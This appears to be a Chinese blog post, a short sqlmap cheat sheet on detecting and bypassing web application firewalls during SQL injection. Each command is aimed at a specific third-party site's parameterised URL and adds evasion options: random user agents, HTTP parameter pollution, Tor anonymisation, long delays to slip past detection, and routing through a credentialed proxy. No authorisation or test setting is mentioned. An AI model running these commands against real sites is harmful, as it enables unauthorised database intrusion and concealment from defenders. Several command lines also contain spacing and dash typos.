SQLmap————9、使用参数绕防火墙

检测web服务是否受到防火墙保护

首选

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4--thread 10   --identify-waf

备选

sqlmap -uhttp://yiliao.kingdee.com/contents.php?id=51&types=4 –thread 10    --check-waf

使用参数绕防火墙

使用任意浏览器进行绕过,尤其是在WAF配置不当的时候

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --random-agent -v2

禁止使用系统的代理,直接连接进行注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --ignore-proxy

清空会话,重构注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4  --flush-session

使用参数--no-cast ,进行字符码转换

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4  --hex

对移动端的服务器进行注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 –mobile

匿名注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4  –tor

使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --hpp-v 3

使用长的延时来避免触发WAF的机制,这方式比较耗时

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --delay=3.5 --time-sec=60

使用代理进行注入

Sqlmap -u  http://yiliao.kingdee.com/contents.php?id=51&types=4   --proxy=211.211.211.211:8080 

              --proxy-cred=211:985

  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值